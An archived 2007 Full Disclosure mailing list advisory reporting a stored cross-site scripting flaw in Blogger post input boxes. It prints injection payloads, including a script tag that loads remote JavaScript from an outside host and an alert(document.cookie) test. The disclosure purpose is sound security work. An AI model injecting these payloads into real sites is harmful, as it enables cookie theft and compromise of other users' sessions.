Full Disclosure mailing list archives
BLOGGER XSS VULNERABILITY
From: "Daniele Costa" <info () cheapware it>
Date: Sat, 11 Aug 2007 19:22:16 +0200
------------------------------------------------------ BLOGGER XSS VULNERABILITY ------------------------------------------------------ Blogspot.com Homepage: http://www.blogspot.com and Blogger.com Homepage: http://www.blogger.com Affected files: Post's Input boxes ------------------------------------------------------ XSS DETAILS ------------------------------------------------------ XSS vuln via injecting javascript code into any post. Blogger doesn't sanitize user input during post process. Try injecting the following code into a post <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> or just the well known <SCRIPT >alert(document.cookie);</SCRIPT> or <SCRIPT >alert(document.domain);</SCRIPT> I've noticed that for any blog hosted at blogspot.com the cookie will be not shown. Otherwise, if the blog is located inside your web site, the cookie will be shown. This probably depends on webserver configuration... ------------------------------------------------------ Proof Of Concept ------------------------------------------------------ http://pocasiculezza.blogspot.com/ ----------------------------------------------------- HISTORY ------------------------------------------------------ Discovered : 07/11/2007 by Daniele Costa Published : 07/11/2007 by Daniele Costa -- =============== Daniele Costa CheapWare Informatica http://www.cheapware.it http://www.iteam5.net http://www.siculezza.it http://www.thetubo.com _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- BLOGGER XSS VULNERABILITY Daniele Costa (Aug 12)
- Re: BLOGGER XSS VULNERABILITY Susam Pal (Aug 12)
- Re: BLOGGER XSS VULNERABILITY Valdis . Kletnieks (Aug 13)
- Re: BLOGGER XSS VULNERABILITY Susam Pal (Aug 13)
- Re: BLOGGER XSS VULNERABILITY Harry Muchow (Aug 13)
- Re: BLOGGER XSS VULNERABILITY Valdis . Kletnieks (Aug 13)
- Re: BLOGGER XSS VULNERABILITY Susam Pal (Aug 12)